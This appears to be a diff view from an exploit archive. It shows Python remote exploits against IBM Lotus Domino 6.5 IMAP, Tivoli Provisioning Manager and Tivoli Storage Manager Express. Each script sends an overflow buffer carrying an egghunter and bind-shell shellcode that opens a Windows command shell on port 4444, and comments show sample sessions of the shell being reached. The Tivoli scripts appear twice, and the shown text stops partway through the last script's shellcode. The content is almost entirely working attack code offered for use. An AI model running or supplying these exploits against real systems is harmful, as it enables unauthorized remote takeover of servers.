"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
bind = 'a001 admin ' + bindshell +'\r\n'
print "[*] Sending bindshell *somewhere* into memory"
sock.send(bind)
response = sock.recv(1024)
sock.close()
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a001 authenticate cram-md5\r\n'
sock.send(auth)
response = sock.recv(1024)
print response
m = md5.new()
m.update(response[2:0])
digest = m.digest()
payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
# 0x774b4c6a CALL [EAX +4]
payload += "jLKw"
payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
login = payload + ' ' + digest
login = base64.encodestring(login) + '\r\n'
print "[*] Triggering overwrite, ph33r."
sock.send(login)
sock.close()
print "[*] You may need to wait up to 2 minutes"
print "[*] for egghunter to find da shell."
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
print '[*] Usage: %s <imap server>\n' % sys.argv[0]
sys.exit(-1)
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
sendbind(target)
sendbind(target)
sendbind(target)
sendbind(target)
ExploitLotus(target)
# milw0rm.com [2007-03-31]

214
platforms/windows/remote/4027.py
View file

@ -1,107 +1,107 @@
#!/usr/bin/python
#
# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com/0day/ibm-ti-pro.py
# Notes:
# * Egghunter can take upto 5 minutes to find the shell.
#
# bt ~ # ./ibm-ti-pro.py 192.168.9.32
# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# [*] muts@offensive-security.com
#
# [*] Sending evil payload to 192.168.9.32:8080
# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
# [*] Happy Hunting!
#
# bt ~ # nc -nv 192.168.9.32 4444
# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket
import os
import sys
def banner():
print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
print "[*] muts@offensive-security.com"
if len(sys.argv)!=2:
banner()
print "[*] Usage: ibm-ti-pro.py <ip>\n"
sys.exit(0)
#77E0211B FFD4 CALL ESP Win2k SP0
banner()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8080 ) )
# Payload #1
sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# Payload #2
# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
print "[*] Sending evil payload to "+sys.argv[1] +":8080"
expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n')
print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell"
print "[*] Happy Hunting!"
expl.close()
# milw0rm.com [2007-06-03]
#!/usr/bin/python
#
# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com/0day/ibm-ti-pro.py
# Notes:
# * Egghunter can take upto 5 minutes to find the shell.
#
# bt ~ # ./ibm-ti-pro.py 192.168.9.32
# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# [*] muts@offensive-security.com
#
# [*] Sending evil payload to 192.168.9.32:8080
# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
# [*] Happy Hunting!
#
# bt ~ # nc -nv 192.168.9.32 4444
# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket
import os
import sys
def banner():
print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
print "[*] muts@offensive-security.com"
if len(sys.argv)!=2:
banner()
print "[*] Usage: ibm-ti-pro.py <ip>\n"
sys.exit(0)
#77E0211B FFD4 CALL ESP Win2k SP0
banner()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8080 ) )
# Payload #1
sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# Payload #2
# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
print "[*] Sending evil payload to "+sys.argv[1] +":8080"
expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n')
print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell"
print "[*] Happy Hunting!"
expl.close()
# milw0rm.com [2007-06-03]

200
platforms/windows/remote/4573.py
View file

@ -1,100 +1,100 @@
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# E:\Program Files\Tivoli\TSM\baclient>
import socket
import sys
print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
print "[*] http://www.offensive-security.com"
def usage():
print "[*] Usage: ./dsmcad.py <host>"
sys.exit(1)
if len(sys.argv) != 2:
usage()
buffer="BirdsflyinghighyouknowhowIfeel"
buffer+="SunintheskyyouknowhowIfeel"
buffer+="ReeedsdriftinonbyyouknowhowIfeel"
buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"
buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
buffer+="\x90"*4
buffer+=(
# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31"
"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33"
"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c"
"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65"
"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75"
"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c"
"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b"
"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a"
"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64"
"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66"
"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57"
"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54"
"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73"
"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b"
"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63"
"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58"
"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f"
"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73"
"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e"
"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42"
"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71"
"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41"
"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62"
"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c"
"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49"
"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b"
"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e"
"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a"
"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72"
"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76"
"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37"
"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30"
"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e"
"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30"
"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76"
"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68"
"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e"
"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46"
"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b"
"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b"
"\x4f\x48\x56\x49\x6f\x48\x50\x61")
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[*] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 1581 ) )
print "[*] Sending evil buffer, ph33r"
expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n')
expl.close()
print "[*] Check port 4444 for bindshell"
# milw0rm.com [2007-10-27]
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# E:\Program Files\Tivoli\TSM\baclient>
import socket
import sys
print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
print "[*] http://www.offensive-security.com"
def usage():
print "[*] Usage: ./dsmcad.py <host>"
sys.exit(1)
if len(sys.argv) != 2:
usage()
buffer="BirdsflyinghighyouknowhowIfeel"
buffer+="SunintheskyyouknowhowIfeel"
buffer+="ReeedsdriftinonbyyouknowhowIfeel"
buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"
buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
buffer+="\x90"*4
buffer+=(
# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31"
"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33"
"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c"
"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65"
"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75"
"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c"
"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b"
"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a"
"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64"
"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66"
"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57"
"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54"
"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73"
"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b"
"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63"
"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58"
"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f"
"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73"
"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e"
"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42"
"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71"
"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41"
"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62"
"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c"
"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49"
"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b"
"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e"
